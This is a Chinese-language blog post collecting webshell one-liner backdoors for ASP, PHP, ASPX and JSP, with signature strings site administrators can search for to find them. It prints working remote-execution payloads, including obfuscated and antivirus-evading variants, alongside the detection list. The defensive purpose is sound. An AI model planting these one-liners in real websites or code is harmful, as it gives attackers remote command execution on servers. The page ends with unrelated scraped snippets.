收集一些常見的webshell後門的特徵碼

2021-07-10 15:34:20 字數 2438 閱讀 1089

2010-02-26 21:17

3571人閱讀收藏 

舉報vbscript

cmdsystem

正規表示式

phpasp

一些常見的webshell(asp,aspx,php,jsp等)後門木馬。

一句話木馬具體有以下這些,這些都是自己平時收集的。(當然收集不齊全,希望大家幫忙完善~)

*************************===

asp一句話木馬:

<%%25execute(request("a"))%%25>

<%execute(request("a"))%>

%><%execute request("a")%><%

<%25execute(request("a"))%25>

%><%execute request("yy")%>

<%execute request(char(97))%>

<%eval request(char(97))%>

":execute request("value"):a="

在資料庫裡插入的一句話木馬

┼攠數畣整爠煥敵瑳∨∣┩愾

┼症汙爠煥敵瑳∨≡┩>   密碼為: a

utf-7的馬

<%@ codepage=65000%>

<% response.charset="936"%>

<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+aci-#+aci)+j-)+j-%>

script encoder 加密

<%@ language = vbscript.encode %>

<%#@~^pgaaaa==r6p. ;!+/d`14dv&x#*@!@*erppd4+ p2xn^ed+vvg4cs,dn;!n/d`^4m`&xb*obmaaa==^#~@%>

可以躲過雷客圖的一句話。

<%

set ms = server.createobject("msscriptcontrol.scriptcontrol.1")

ms.language="vbscript"

ms.addobject "response", response

ms.addobject "request", request

ms.executestatement("ev"&"al(request(""1""))")

%>

php一句話

<? php eval($_post[cmd]);?>

<?php eval($_post[cmd]);?>

<?php system($_request['cmd']);?>

<?php eval($_post[1]);?>

aspx一句話

jsp一句話後門

******************************==我是**的分界線******************************

為什麼收集這些東東?

有些站長說,webshell找到了,伺服器打了補丁,**漏洞也給補上了。甚至把整個web目錄所有的檔案都檢查了多次,都沒找到可疑的檔案。為什麼黑客還是讓**掛上木馬了?

猜也猜得到拉,被放後門唄!那後門在哪?比較簡單而且有效的方法當然是在正常檔案裡寫入一句話木馬了,以後連線上去就是了。況且防毒軟體對某些一句話木馬不敏感,這個,玩黑的朋友都知道了~

也許你會問,能不能徹底把後門挖出來?這個難說~我就不敢保證了,哈哈。。。

不過下面這些或許對你有幫助。

asp木馬特徵:

aspshell

execute(request

execute request(

eval request(

"ev"&"al(request(

executeglobal request

┼症汙爠煥敵瑳∨≡┩>

┼攠數畣整爠煥敵瑳∨∣┩愾

sqlrootkit

專用小馬

小馬整站檔案打包

確認解包嗎

dama

不要幹壞事

hack

****

鬱悶,許可權不夠估計不能執行命令!

php木馬特徵:

asp.net木馬特徵:

aspxspy

專用小馬

rootkit

jsp木馬特徵:

jfolder    (我就只有這個。。。)

以上面這些作為特徵碼,用這個工具advanced find and replace

搜尋可疑的檔案,或許會找出點**的東西,還工具還可以批量清馬,並支援正規表示式,站長必備工具,呵呵!

當然還可以按檔案修改時間進行搜尋可疑檔案,不過有些webshell支援檔案屬性修改。

afr (advanced find and replace) 中文綠色版.rar

之前轉了個文章,這裡有介紹

收集的一些題or結論

兩條單鏈表如果交叉的話不可能一條有環一條沒有環。已知有個rand7 的函式,返回1到7隨機自然數,讓利用這個rand7 構造rand10 隨機1 10 rand7 1 7得到乙個離散整數集合a 其中每個整數的出現概率也都是1 7。而rand7 得到的集合b 中每個整數出現的概率也是1 7。顯然集合a...

php LFI漏洞的一些收集

1.lfi全稱是local file include,先舉個最簡單的例子來說明下 file get file if isset file include file else include key.php 測試如下 2.最二的防範 file str replace get file var dump...

關於抽象的一些收集

什麼是抽象?什麼是抽象等級高?什麼是具象?大家天天說抽象,甚至還在比較抽象的等級高階,但是我實在不知道大家腦子裡的 抽象 一詞到底是什麼意思?首先,很關鍵的一點是 現在你站在 最關鍵的是觀察者主體的位置處在 首先關鍵的是參照點。更令人迷惑的是你一定會運動!因為你是主體,你有主觀能動性,你可以在問題空...